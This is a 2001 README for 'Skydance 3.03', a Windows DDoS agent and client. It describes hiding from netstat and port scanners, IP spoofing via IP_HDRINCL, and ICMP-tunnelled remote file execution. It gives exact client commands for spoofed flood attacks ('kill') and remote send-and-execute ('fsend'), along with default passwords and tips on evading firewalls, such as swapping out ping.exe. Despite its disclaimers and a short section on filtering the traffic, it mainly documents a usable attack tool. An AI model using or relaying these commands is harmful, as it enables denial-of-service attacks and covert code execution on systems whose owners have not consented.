by Edrin
Written in Microsoft Visual C++
Released in March 2001
Made in Germany
This is - Skydance 3.03 - by [email protected] ! This is README.TXT-Version 3 http://skd.box.sk Disclaimer - Read This First: Everything in this document is based on the results i got from developing skydance. Skydance 3.03 is an EXAMPLE of a Distributed Denial of Service attack! Use SKYDANCE 3.03 SOURCE, README AND BINARY ON YOUR OWN RISK, i will NEVER be responsible for any HARM or harmfull things that happen because SKYDANCE source was USED! That means I do NOT guarantee for any features and security-thing and i do not guarantee that this program works properly!!! Indeed i guarantee for nothing ;) Use the binaries to test how a DDoS is used! Do not install the Skydance binary on a system that you do not own because this is probably illgeal! Do not use Skydance and it�s components to attack a server because this is illegal, too! Use this source and binary only to learn about how to defend/protect against Windows DDoS! Do not give a modify a binary and do not give it to another person! Use SKYDANCE 3.03 SOURCE, README AND BINARY ON YOUR OWN RISK! suggestions against SKD303DDoS: goto ---> 4. d) #tested with win98 and win2k ------------------------------------------------------------------------------------------------------ password for binary files in ZIP: dontharm if you compile it "as it is" without changes: ####################################### #Note: for skd303s.exe <pass> = nerv # ####################################### 1. What is it? 2. client usage: 3. About source code: 4. How to filter SKD303DDoS pongs 5. ICMP "ability" of win32 winsock (Icmp�s you can recv) 6. Some words about DDoS servers that use Windows OS. 1. What is it? Skydance 3.03 is a DDoS for win32 using RAW sockets. source includes this features: - communication with ICMP, including a simple std-windows-"abcd..." ping attack - can not be found with netstat -a (ICMP:) - can not be found with usual Port-Scanners (RAW:) - on win2k-systems communication and attacks are spoofed (IP_HDRINCL:) - server size can be packet to 17 K - client-source can be ported to unix because it is done as console app. - (ICMP tunnel) file(<65kb) can be sent within a spoofed ICMP packet, executes it after receive. 2. client usage: Usage: The Client will try to use a spoofed source address. You should test your spoofing-ability first to ensure that you can not be revealed. The test will fail on WinNT and Win9x/Me systems. It should not fail under Win2000. <spoofed-IP> and <target> must be in style of xxx.xxx.xxx.xxx By default it is 216.32.74.55 = www.yahoo.com <pass> must be <= 4 letters! - To test spoofing-ability: skd303c spoofing - Get Server Info (always unspoofed packets!): skd303c <server> <pass> info Sample: skd303c myknight.com diva info - To attack with spoofed standart-windows-pings: skd303c <server> <pass> kill <target> <time-in-minutes> <spoofed-IP> Sample: skd303c myknight.com diva kill 166.166.166.166 10 12.34.56.78 <time-in-minutes> can be up to 1440 - To send and exectue a file with a spoofed standart-windows-pong: skd303c <server> <pass> fsend <file-name> <new-filename> <spoofed-IP> Sample: skd303c myknight.com diva fsend c:\myfile.exe myfile.exe 98.76.54.32 <file-name> SIZE can be up to 6540 byte, <new-filename> can have up to 39 letters DO NOT HARM PEOPLE! HELP CHILDREN IN AFRICA! greetings, Edrin 3. About source code: why this source needed to be modified to abuse it: first of all: it is not possibel to receive ICMP_ECHOREQUESTS with winsock ( -> 5.) so I decided to use ICMP_ECHORESPONSE in my source. Anyway this makes it much more easier for Firewalls next thing: communication pong have std unix ping size... but anyway i�m not sure. 84 byte in total? (IP header 20 + ICMP 64) the std-windows pings are the only attack i added and this attack is not very powerful and a simple firewall might be able to stop an attack The size of this std windows ping is #define STANDART_PINGSIZE 60 (byte) that means the data flood is not as big as it could be! There are probably othere DoS that are much more effective. Anyway my win2k 550 MHz had 100% CPU usage in a 10 MBit local area net. In addition to that it would be neccessary that the info function returns the OS version to get sure that a server is "spoofable". Another thing that can reaveal skydance: i didn�t crypt the unsigned char cCommand; (the command in my message-struct) so a sniffer would always see a k(kill), i(info) or f(file) at position FULL_PACKET[35 ?] For example someone could use the first password letter +/- xy for a "crypted" command or maybe some real crypto in my opinion a crypto is not realy necessary. And there is no self installing code in my source! 4. How to filter SKD303DDoS pongs As i already mentioned: In communictaion pongs: a) communictaion with unix 84-byte PONGS ! ICMP_ECHORESPONSE b) 'k', 'i', 'f' at position FULL_PACKET[35] or ICMP_STRUCT[15] (IPheader = 20 byte) c) an 'i' pong is UNSPOOFED! so TRACE-BACKE would possibel! ---->> d) block each suspicious "ok-ICMP" in ( -> 5.) I THINK THIS WOULD PROTECT BEST!!! i have no more ideas, do you? 5. ICMP "ability" of win32 winsock (Icmp�s you can recv) Blocking each "ok-ICMP" might block communictation of each win-ICMP-DDoS I tested it in a few minutes, no warranty, proof it yourself! 0 Echo reply. ok 1 Reserved. ok 2 Reserved. ok 3 Destination unreachable. failed 4 Source quench. failed 5 Redirect. failed 6 Alternate Host Address. ok 7 ok 8 Echo request. failed (this "would" be nice to receive) 9 Router advertisement. ok 10 Router solicitation. ok 11 Time exceeded. failed 12 Parameter problem. failed 13 Timestamp request. failed 14 Timestamp reply. ok 15 Information request. ok 16 Information reply. ok 17 Address mask request. failed 18 Address mask reply. ok 19 Reserved (for security). ok 20 ok - unknown 29 Reserved (for robustness experiment).ok 30 Traceroute. ok 31 Conversion error. ok 32 Mobile Host Redirect. ok 33 IPv6 Where-Are-You. ok 34 IPv6 I-Am-Here. ok 35 Mobile Registration Request. ok 36 Mobile Registration Reply. ok 37 Domain Name request. ok 38 Domain Name reply. ok 39 SKIP Algorithm Discovery Protocol. ok 40 Photuris, Security failures. ok 41 ok - unknown 255 Reserved. ok 6. Some words about DDoS from Windows OS. The new feature IP_HDRINCL that comes with win2k can make windows to a powerful DDoS server because it enables IP-spoofing! IP_HDRINCL in source: --> setsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); <-- That means win2k-servers will become a base for DDoS that is equal to *nix servers. Anyway most windows systems remain dial-in computers that have dynamic IP. That means such a DDoS as SKD3.03 can not be used with it in a serious way. I think for such Computers the most threatoning DDoS remain IRC-"bots"! Firewalls that control each winsock access are quite good. They would probably detect DDoS servers. Anyway: Maybe you can replace ping.exe with a DDoS and maybe firewall does not detect a DDoS then... Thx for reading, [email protected]MegaSecurity